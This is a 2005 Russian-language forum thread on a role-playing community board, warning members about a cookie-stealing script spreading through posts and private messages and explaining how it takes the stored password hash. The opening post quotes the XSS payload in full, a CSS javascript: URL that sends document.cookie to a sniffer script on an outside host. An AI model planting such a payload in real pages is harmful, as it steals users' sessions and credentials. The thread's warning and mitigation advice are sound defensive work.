Город Мастеров
IPB

Здравствуйте, гость ( Вход | Регистрация )

> !ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!, ВАШИХ ПАРОЛЕЙ
Leon PRO
сообщение Oct 25 2005, 17:35
Сообщение #1


Ушедший на войну
Иконки Групп

Класс: Маг
Характер: Chaotic Good
Раса: Человек
NWN: Контент



Если вам опера выдает в постах или в любой точке форума что-то типа:

` style=`background:url(javaSCript:document.images[1].src="http://runiverse.net/forum/images/avatars/xxx/snif.php?"+document.cookie)`

Или по ПМ, или в любом виде - немедленно сообщите об этом Айвану, ДБКолу или любому супермодератору, чтобы автор этих сообшений был забанен.

Этот скрипт опасен. Он похищает ваши пароли.
Вернуться в начало страницы
Скопировать ник в поле быстрого ответа
+Ответить с цитированием данного сообщения
 
Открыть новую тему
Ответов
slavaz
сообщение Oct 26 2005, 00:44
Сообщение #2


Пингвиноид
Иконки Групп

Класс: Обыватель
Характер: True Neutral
Раса: Человек



Скрипт ворует кукисы, один из кукисов называется pass_hash
В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного.

Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство...
Добавлено в 01:55
Добавлю...
Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию.
Добавлено в 02:09
QUOTE (maximal_up @ Oct 25 2005, 19:45)
Говорит о крутости Оперы и о дыре в форуме.

Это говорит об убогости Оперы и кривости рук писателей форума (на наше счастье, в IPB2 уже хранятся произвольно хэшированные пароли)

А по поводу Оперы: document.cookie описан в стандарте w3c, является нормальной штатной фишкой и "на ура" поддерживается IE и Mozilla/Firefox/Konqueror. Опера, блин, как всегда "впереди планеты всей". :(

А то, что document.cookie воспользовались в таких целях - так это и кухонным ножом можно мирно хлеб нарезать, а можно и зарезать кого...
Вернуться в начало страницы
Скопировать ник в поле быстрого ответа
+Ответить с цитированием данного сообщения

Сообщений в этой теме
- Leon PRO   !ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!   Oct 25 2005, 17:35
- - Lex   Был замечен wasd.   Oct 25 2005, 18:04
- - virus_found   QUOTE (Leon PRO @ Oct 25 2005, 18:35)Если ва...   Oct 25 2005, 18:10
- - maximal_up   Так-с-с... 1.Ошибка оперы или форума? 2. Это мож...   Oct 25 2005, 18:20
- - Lex   мне пришло на пм. Я добанил его до 100 (Леон уже 2...   Oct 25 2005, 18:31
- - Клемент Астилон   В других браузерах скрипт просто ворует у вас паро...   Oct 25 2005, 18:42
- - maximal_up   Говорит о крутости Оперы и о дыре в форуме. Что за...   Oct 25 2005, 18:45
- - RiPPeR   У нормальный людей JS is disabled   Oct 25 2005, 18:53
- - virus_found   QUOTE (RiPPeR @ Oct 25 2005, 19:53)У нормаль...   Oct 25 2005, 18:57
- - Lex   QUOTE (Clement Astilon @ Oct 25 2005, 19:42)...   Oct 25 2005, 19:02
- - Salivin   Не знаю,не знаю..в ИЕ тоже виден кусок.   Oct 25 2005, 20:00
- - Валеско   А если FireFox? Что ж мне теперь - все пароли меня...   Oct 25 2005, 20:07
- - slavaz   Скрипт ворует кукисы, один из кукисов называется p...   Oct 26 2005, 00:44
- - Richard   Дырка для закрытия глюка с несанкционированным пол...   Oct 26 2005, 08:03
- - Aiwan   CODE wasd 219.149.233.179 guru@komifree.ru Я ещ...   Oct 26 2005, 15:49
- - Lex   QUOTE (Aiwan @ Oct 26 2005, 16:49)Отправлено...   Oct 26 2005, 16:16
- - Валеско   Айв, судя по всем это прокси. Кому бы из Китая наш...   Oct 26 2005, 16:34
- - maximal_up   А разве через посты ай-пи не прбить? Я не думаю, ч...   Oct 26 2005, 17:19
- - Валеско   QUOTE Я не думаю, что он его как-то изменял или ск...   Oct 26 2005, 18:05
- - Lex   QUOTE (maximal_up @ Oct 26 2005, 18:19)А раз...   Oct 26 2005, 18:05
- - Aiwan   Заплатки нет пока. так что не сохраняйте пасс свой...   Oct 26 2005, 18:07
- - Vhall   к слову... http://droaam.nm.ru/images/hak-lam.jpg   Oct 27 2005, 16:24
- - maximal_up   QUOTE (Lex @ Oct 26 2005, 19:05)а если у нег...   Oct 27 2005, 16:32
- - Vhall   maximal_up http://ru.wikipedia.org/wiki/%D0%9F%D...   Oct 27 2005, 21:21


Ответить в эту темуОткрыть новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Текстовая версия Сейчас: 17th June 2025 - 20:03